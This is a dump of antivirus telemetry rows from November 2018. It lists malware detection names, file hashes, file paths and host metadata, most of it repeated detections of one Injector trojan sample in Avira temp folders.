  Row(detection=Row(filename='avscan-20181102-062649-405702e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062649-405702E8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052831-1b4f0e07', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052831-1B4F0E07', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055314-8ee41a70', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055314-8EE41A70', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052139-25bfa2fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052139-25BFA2FA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061906-2c58dc93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061906-2C58DC93', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061728-f1c74e31', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061728-F1C74E31', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055004-1dcbaf7b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055004-1DCBAF7B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061630-cf10ba1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061630-CF10BA1B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062541-176b52fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062541-176B52FB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055351-a521f266', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055351-A521F266', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060026-907b66ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060026-907B66BA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052146-29a6b5c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052146-29A6B5C8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060340-0464efe3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060340-0464EFE3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061003-e88c6f45', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061003-E88C6F45', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060006-844dfe83', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060006-844DFE83', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055143-588b3338', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055143-588B3338', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062014-545b9050', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062014-545B9050', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052154-2ea9bee5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052154-2EA9BEE5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055714-1e58e82e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055714-1E58E82E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T16:02:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062238-aaaed8bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062238-AAAED8BF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050541-ea565dab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050541-EA565DAB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050933-74d23ce4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050933-74D23CE4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051423-21596815', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051423-21596815', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T09:50:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054420-50e82099', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054420-50E82099', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054440-5c6f5627', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054440-5C6F5627', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055744-2fab7635', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055744-2FAB7635', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050843-56c194d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050843-56C194D7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060959-e640c8ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060959-E640C8EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062419-e6c6709b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062419-E6C6709B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051725-8e42df03', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051725-8E42DF03', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060939-da022db5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060939-DA022DB5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060153-c4362d63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060153-C4362D63', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T01:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T12:24:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054315-2a249cef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054315-2A249CEF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060213-d0675fcb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060213-D0675FCB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055437-c04bafcf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055437-C04BAFCF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062131-824a7a04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062131-824A7A04', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051408-188cf6c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051408-188CF6C3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-155001-855066fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155001-855066FC', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:50:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155433-35184a28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155433-35184A28', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:13:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='50cd9d3464379.ocx', filepath='50cd9d3464379.ocx', filesize=128000, name='ADWARE/Adware.Gen.#M2.#R4876'), hash='4f2c543edd9f54151ae962e25b743ac11b649e68ab9bcb8a66c0c5202edc2f7f', metadata=Row(cmdline=None, country='TW', os_name='Linux', os_vmajor='Ubuntu 14', os_vminor='04', parentproc=None, parentsize=None, timestamp='2018-11-01T02:21:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T13:00:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160206-ff73c245', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160206-FF73C245', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='documentos diversos .scr', filepath='C:\\Users\\X\\Desktop\\Documentos diversos .scr', filesize=320000, name='WORM/Nenebra.A.#M1.#R1'), hash='53a514f013d76540f5daf64de34a640b8a214a9af019a5c257fd562ca7d50ee5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe2_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:41:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp5122348\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Elshayal_Smart_Downloader_3192770573.exe', parentsize=1885792, timestamp='2018-11-01T04:38:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh53fd', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH53FD', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:43:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201838-2b0fe39e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-201344-FB3B2491\\AVSCAN-20181101-201838-2B0FE39E', filesize=1536000, name='TR/CoinMiner.DC.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:18:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7096569\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/SL5=\\\\\\"$703DC,11849392,56832,C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\CheatEngine67.exe\\\\\\" \\\\\\/SPAWNWND=$803E2 \\\\\\/NOTIFYWND=$903B8 ', country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\is-STNMA.tmp\\CheatEngine67.tmp', parentsize=723552, timestamp='2018-11-01T05:46:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152523-413569af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-152056-1BEC4832\\AVSCAN-20181101-152523-413569AF', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:44:07Z'), dt=datetime.date(2018, 11, 1)),
